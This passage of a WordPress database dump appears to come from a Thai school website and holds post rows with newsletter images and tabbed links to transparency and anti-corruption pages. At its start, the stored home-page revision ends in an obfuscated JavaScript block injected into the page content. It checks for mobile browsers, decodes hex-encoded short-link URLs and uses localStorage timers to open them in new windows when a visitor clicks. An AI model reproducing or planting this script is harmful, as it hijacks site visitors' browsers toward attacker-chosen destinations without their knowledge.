)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-05-16 15:11:02','2025-05-16 08:11:02','',14,'http://pakhaeng.ssk.in.th/?p=1254',0,'revision','',0),
(1256,1,'2025-05-16 15:18:54','2025-05-16 08:18:54','<!-- wp:generateblocks/image {\"uniqueId\":\"6415f4c6\",\"mediaId\":1257,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-6415f4c6\"><img class=\"gb-image gb-image-6415f4c6\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/4-68.png\" alt=\"\" title=\"4-68\"/></figure>\n<!-- /wp:generateblocks/image -->','วารสารประชาสัมพันธ์ ฉบับที่ 4 ปีที่ 3 ลว. 16 พฤษภาคม พ.ศ. 2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%89%e0%b8%9a-3','','','2025-05-16 15:18:55','2025-05-16 08:18:55','',0,'http://pakhaeng.ssk.in.th/?p=1256',0,'post','',0),
(1257,1,'2025-05-16 15:18:42','2025-05-16 08:18:42','','4-68','','inherit','','closed','','4-68','','','2025-05-16 15:18:42','2025-05-16 08:18:42','',1256,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/4-68.png',0,'attachment','image/png',0),
(1258,1,'2025-05-16 15:18:54','2025-05-16 08:18:54','<!-- wp:generateblocks/image {\"uniqueId\":\"6415f4c6\",\"mediaId\":1257,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-6415f4c6\"><img class=\"gb-image gb-image-6415f4c6\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/4-68.png\" alt=\"\" title=\"4-68\"/></figure>\n<!-- /wp:generateblocks/image -->','วารสารประชาสัมพันธ์ ฉบับที่ 4 ปีที่ 3 ลว. 16 พฤษภาคม พ.ศ. 2568','','inherit','closed','closed','','1256-revision-v1','','','2025-05-16 15:18:54','2025-05-16 08:18:54','',1256,'http://pakhaeng.ssk.in.th/?p=1258',0,'revision','',0),
(1259,1,'2025-05-21 11:58:51','2025-05-21 04:58:51','','2025','','inherit','','closed','','2025','','','2025-05-21 11:58:51','2025-05-21 04:58:51','',871,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png',0,'attachment','image/png',0),
(1260,1,'2025-05-21 11:58:58','2025-05-21 04:58:58','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 